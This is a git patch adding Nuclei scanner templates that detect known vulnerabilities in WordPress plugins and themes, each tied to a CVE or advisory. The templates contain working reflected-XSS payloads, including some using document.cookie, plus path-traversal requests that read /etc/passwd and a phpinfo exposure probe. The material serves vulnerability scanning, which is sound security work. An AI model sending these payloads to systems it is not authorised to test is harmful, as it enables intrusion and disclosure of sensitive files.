From 80c791830b7a5932836189b3ac24ed22b55edef8 Mon Sep 17 00:00:00 2001 From: daffainfo Date: Fri, 16 Jul 2021 08:28:45 +0700 Subject: [PATCH] Adding some new templates --- CVE-2011-1669.yaml | 27 ++++++++++++++++++++++ CVE-2011-4618.yaml | 3 ++- CVE-2011-4624.yaml | 3 ++- CVE-2011-4926.yaml | 3 ++- CVE-2011-5106.yaml | 30 +++++++++++++++++++++++++ CVE-2011-5107.yaml | 3 ++- CVE-2011-5179.yaml | 3 ++- CVE-2011-5181.yaml | 5 +++-- CVE-2011-5265.yaml | 3 ++- CVE-2012-0901.yaml | 3 ++- CVE-2012-2371.yaml | 3 ++- CVE-2012-4273.yaml | 30 +++++++++++++++++++++++++ CVE-2012-4768.yaml | 30 +++++++++++++++++++++++++ CVE-2012-5913.yaml | 3 ++- CVE-2013-4117.yaml | 30 +++++++++++++++++++++++++ CVE-2013-4625.yaml | 30 +++++++++++++++++++++++++ CVE-2014-4513.yaml | 30 +++++++++++++++++++++++++ CVE-2015-1000012.yaml | 25 +++++++++++++++++++++ CVE-2015-9480.yaml | 25 +++++++++++++++++++++ CVE-2016-10956.yaml | 25 +++++++++++++++++++++ CVE-2019-19134.yaml | 30 +++++++++++++++++++++++++ CVE-2019-9618.yaml | 27 ++++++++++++++++++++++ CVE-2020-12054.yaml | 30 +++++++++++++++++++++++++ CVE-2020-17362.yaml | 30 +++++++++++++++++++++++++ CVE-2021-24298.yaml | 30 +++++++++++++++++++++++++ CVE-2021-24320.yaml | 30 +++++++++++++++++++++++++ CVE-2021-24335.yaml | 30 +++++++++++++++++++++++++ CVE-2021-24389.yaml | 30 +++++++++++++++++++++++++ phpinfo.yaml | 47 +++++++++++++++++++++++++++++++++++++++ wp-custom-tables-xss.yaml | 30 +++++++++++++++++++++++++ wp-flagem-xss.yaml | 29 ++++++++++++++++++++++++ wp-nextgen-xss.yaml | 29 ++++++++++++++++++++++++ wp-slideshow-xss.yaml | 32 ++++++++++++++++++++++++++ 33 files changed, 707 insertions(+), 11 deletions(-) create mode 100644 CVE-2011-1669.yaml create mode 100644 CVE-2011-5106.yaml create mode 100644 CVE-2012-4273.yaml create mode 100644 CVE-2012-4768.yaml create mode 100644 CVE-2013-4117.yaml create mode 100644 CVE-2013-4625.yaml create mode 100644 CVE-2014-4513.yaml create mode 100644 CVE-2015-1000012.yaml create mode 100644 CVE-2015-9480.yaml create mode 100644 CVE-2016-10956.yaml create mode 100644 CVE-2019-19134.yaml create mode 100644 CVE-2019-9618.yaml create mode 100644 CVE-2020-12054.yaml create mode 100644 CVE-2020-17362.yaml create mode 100644 CVE-2021-24298.yaml create mode 100644 CVE-2021-24320.yaml create mode 100644 CVE-2021-24335.yaml create mode 100644 CVE-2021-24389.yaml create mode 100644 phpinfo.yaml create mode 100644 wp-custom-tables-xss.yaml create mode 100644 wp-flagem-xss.yaml create mode 100644 wp-nextgen-xss.yaml create mode 100644 wp-slideshow-xss.yaml diff --git a/CVE-2011-1669.yaml b/CVE-2011-1669.yaml new file mode 100644 index 0000000..1a448f5 --- /dev/null +++ b/CVE-2011-1669.yaml @@ -0,0 +1,27 @@ +id: CVE-2011-1669 + +info: + name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI) + author: daffainfo + severity: high + description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. + reference: | + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 + - https://www.exploit-db.com/exploits/17119 + tags: cve,cve2011,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/CVE-2011-4618.yaml b/CVE-2011-4618.yaml index 6593682..e043051 100644 --- a/CVE-2011-4618.yaml +++ b/CVE-2011-4618.yaml @@ -4,6 +4,7 @@ info: name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618 tags: cve,cve2011,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2011-4624.yaml b/CVE-2011-4624.yaml index 5ad804b..6b6eae3 100644 --- a/CVE-2011-4624.yaml +++ b/CVE-2011-4624.yaml @@ -4,6 +4,7 @@ info: name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624 tags: cve,cve2011,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2011-4926.yaml b/CVE-2011-4926.yaml index bc278b7..17178b7 100644 --- a/CVE-2011-4926.yaml +++ b/CVE-2011-4926.yaml @@ -4,6 +4,7 @@ info: name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926 tags: cve,cve2011,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2011-5106.yaml b/CVE-2011-5106.yaml new file mode 100644 index 0000000..a17da7f --- /dev/null +++ b/CVE-2011-5106.yaml @@ -0,0 +1,30 @@ +id: CVE-2011-5106 + +info: + name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2011-5107.yaml b/CVE-2011-5107.yaml index d62a889..c01e565 100644 --- a/CVE-2011-5107.yaml +++ b/CVE-2011-5107.yaml @@ -4,6 +4,7 @@ info: name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107 tags: cve,cve2011,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2011-5179.yaml b/CVE-2011-5179.yaml index ba0bd6e..9c92b5c 100644 --- a/CVE-2011-5179.yaml +++ b/CVE-2011-5179.yaml @@ -4,6 +4,7 @@ info: name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179 tags: cve,cve2011,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2011-5181.yaml b/CVE-2011-5181.yaml index 1ee7cb8..41812c7 100644 --- a/CVE-2011-5181.yaml +++ b/CVE-2011-5181.yaml @@ -1,9 +1,10 @@ id: CVE-2011-5181 info: - name: ClickDesk Live Support - Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) + name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 tags: cve,cve2011,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2011-5265.yaml b/CVE-2011-5265.yaml index 109499f..2ed7592 100644 --- a/CVE-2011-5265.yaml +++ b/CVE-2011-5265.yaml @@ -4,6 +4,7 @@ info: name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265 tags: cve,cve2011,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2012-0901.yaml b/CVE-2012-0901.yaml index 6f20b82..fb82bdf 100644 --- a/CVE-2012-0901.yaml +++ b/CVE-2012-0901.yaml @@ -4,6 +4,7 @@ info: name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901 tags: cve,cve2012,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2012-2371.yaml b/CVE-2012-2371.yaml index e9bf01a..61a2207 100644 --- a/CVE-2012-2371.yaml +++ b/CVE-2012-2371.yaml @@ -4,6 +4,7 @@ info: name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371 tags: cve,cve2012,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2012-4273.yaml b/CVE-2012-4273.yaml new file mode 100644 index 0000000..db31bfa --- /dev/null +++ b/CVE-2012-4273.yaml @@ -0,0 +1,30 @@ +id: CVE-2012-4273 + +info: + name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2012-4768.yaml b/CVE-2012-4768.yaml new file mode 100644 index 0000000..e89963b --- /dev/null +++ b/CVE-2012-4768.yaml @@ -0,0 +1,30 @@ +id: CVE-2012-4768 + +info: + name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?dlsearch=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2012-5913.yaml b/CVE-2012-5913.yaml index 23512f1..be685d2 100644 --- a/CVE-2012-5913.yaml +++ b/CVE-2012-5913.yaml @@ -4,6 +4,7 @@ info: name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913 tags: cve,cve2012,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2013-4117.yaml b/CVE-2013-4117.yaml new file mode 100644 index 0000000..f30a61b --- /dev/null +++ b/CVE-2013-4117.yaml @@ -0,0 +1,30 @@ +id: CVE-2013-4117 + +info: + name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117 + tags: cve,cve2013,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2013-4625.yaml b/CVE-2013-4625.yaml new file mode 100644 index 0000000..4b9f913 --- /dev/null +++ b/CVE-2013-4625.yaml @@ -0,0 +1,30 @@ +id: CVE-2013-4625 + +info: + name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625 + tags: cve,cve2013,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28123%29;%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2014-4513.yaml b/CVE-2014-4513.yaml new file mode 100644 index 0000000..dfcae28 --- /dev/null +++ b/CVE-2014-4513.yaml @@ -0,0 +1,30 @@ +id: CVE-2014-4513 + +info: + name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Multiple cross-site scripting (XSS) vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4513 + tags: cve,cve2014,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%22%3E%3C/textarea%3E%3Cscript%3Ealert%28123%29%3C/script%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2015-1000012.yaml b/CVE-2015-1000012.yaml new file mode 100644 index 0000000..eb9030a --- /dev/null +++ b/CVE-2015-1000012.yaml @@ -0,0 +1,25 @@ +id: CVE-2015-1000012 + +info: + name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI) + author: daffainfo + severity: high + reference: | + - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 + tags: cve,cve2015,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + part: body + - type: status + status: + - 200 diff --git a/CVE-2015-9480.yaml b/CVE-2015-9480.yaml new file mode 100644 index 0000000..92c272b --- /dev/null +++ b/CVE-2015-9480.yaml @@ -0,0 +1,25 @@ +id: CVE-2015-9480 + +info: + name: WordPress Plugin RobotCPA 5 - Directory Traversal + author: daffainfo + severity: high + reference: | + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 + - https://www.exploit-db.com/exploits/37252 + tags: cve,cve2015,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + part: body + - type: status + status: + - 200 diff --git a/CVE-2016-10956.yaml b/CVE-2016-10956.yaml new file mode 100644 index 0000000..4c48c18 --- /dev/null +++ b/CVE-2016-10956.yaml @@ -0,0 +1,25 @@ +id: CVE-2016-10956 + +info: + name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) + author: daffainfo + severity: high + description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php. + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956 + tags: cve,cve2016,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" + - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + part: body + - type: status + status: + - 200 diff --git a/CVE-2019-19134.yaml b/CVE-2019-19134.yaml new file mode 100644 index 0000000..5aeed95 --- /dev/null +++ b/CVE-2019-19134.yaml @@ -0,0 +1,30 @@ +id: CVE-2019-19134 + +info: + name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 + reference: https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(123)%22%3E' + + matchers-condition: and + matchers: + - type: word + words: + - 'foo">' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2019-9618.yaml b/CVE-2019-9618.yaml new file mode 100644 index 0000000..a04b19c --- /dev/null +++ b/CVE-2019-9618.yaml @@ -0,0 +1,27 @@ +id: CVE-2019-9618 + +info: + name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI) + author: daffainfo + severity: high + description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter. + reference: | + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 + - https://seclists.org/fulldisclosure/2019/Mar/26 + tags: cve,cve2019,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/CVE-2020-12054.yaml b/CVE-2020-12054.yaml new file mode 100644 index 0000000..e937c8a --- /dev/null +++ b/CVE-2020-12054.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-12054 + +info: + name: Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query). + reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 + tags: cve,cve2020,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2020-17362.yaml b/CVE-2020-17362.yaml new file mode 100644 index 0000000..2e265da --- /dev/null +++ b/CVE-2020-17362.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-17362 + +info: + name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS. + reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 + tags: cve,cve2020,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?s=%3Cimg%20src%20onerror=alert(123)%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2021-24298.yaml b/CVE-2021-24298.yaml new file mode 100644 index 0000000..b57d43a --- /dev/null +++ b/CVE-2021-24298.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-24298 + +info: + name: Simple Giveaways < 2.36.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298 + tags: cve,cve2021,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/giveaway/mygiveaways/?share=%3Cscript%3Ealert(123)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2021-24320.yaml b/CVE-2021-24320.yaml new file mode 100644 index 0000000..42d9616 --- /dev/null +++ b/CVE-2021-24320.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-24320 + +info: + name: Bello WordPress Theme < 1.6.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues. + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24320 + tags: cve,cve2021,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28123%29%3B%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2021-24335.yaml b/CVE-2021-24335.yaml new file mode 100644 index 0000000..ea7b581 --- /dev/null +++ b/CVE-2021-24335.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-24335 + +info: + name: Car Repair Services < 4.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335 + tags: cve,cve2021,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2021-24389.yaml b/CVE-2021-24389.yaml new file mode 100644 index 0000000..e8b37ed --- /dev/null +++ b/CVE-2021-24389.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-24389 + +info: + name: FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability. + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389 + tags: cve,cve2021,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3E%3Cscript%3Eprompt(123)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/phpinfo.yaml b/phpinfo.yaml new file mode 100644 index 0000000..7e13584 --- /dev/null +++ b/phpinfo.yaml @@ -0,0 +1,47 @@ +id: phpinfo-files + +info: + name: phpinfo Disclosure + author: pdteam,daffainfo,meme-lord + severity: low + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/php.php" + - "{{BaseURL}}/phpinfo.php" + - "{{BaseURL}}/info.php" + - "{{BaseURL}}/infophp.php" + - "{{BaseURL}}/php_info.php" + - "{{BaseURL}}/test.php" + - "{{BaseURL}}/i.php" + - "{{BaseURL}}/asdf.php" + - "{{BaseURL}}/pinfo.php" + - "{{BaseURL}}/phpversion.php" + - "{{BaseURL}}/time.php" + - "{{BaseURL}}/index.php" + - "{{BaseURL}}/temp.php" + - "{{BaseURL}}/old_phpinfo.php" + - "{{BaseURL}}/infos.php" + - "{{BaseURL}}/linusadmin-phpinfo.php" + - "{{BaseURL}}/php-info.php" + + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '>PHP Version <\/td>([0-9.]+)' \ No newline at end of file diff --git a/wp-custom-tables-xss.yaml b/wp-custom-tables-xss.yaml new file mode 100644 index 0000000..d29132c --- /dev/null +++ b/wp-custom-tables-xss.yaml @@ -0,0 +1,30 @@ +id: wp-custom-tables-xss + +info: + name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS) + author: daffainfo + severity: medium + description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability + reference: https://www.securityfocus.com/bid/54326/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/wp-flagem-xss.yaml b/wp-flagem-xss.yaml new file mode 100644 index 0000000..bcd78b1 --- /dev/null +++ b/wp-flagem-xss.yaml @@ -0,0 +1,29 @@ +id: wp-flagem-xss + +info: + name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.exploit-db.com/exploits/38674 + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/wp-nextgen-xss.yaml b/wp-nextgen-xss.yaml new file mode 100644 index 0000000..30f3806 --- /dev/null +++ b/wp-nextgen-xss.yaml @@ -0,0 +1,29 @@ +id: wp-nextgen-xss + +info: + name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS) + author: daffainfo 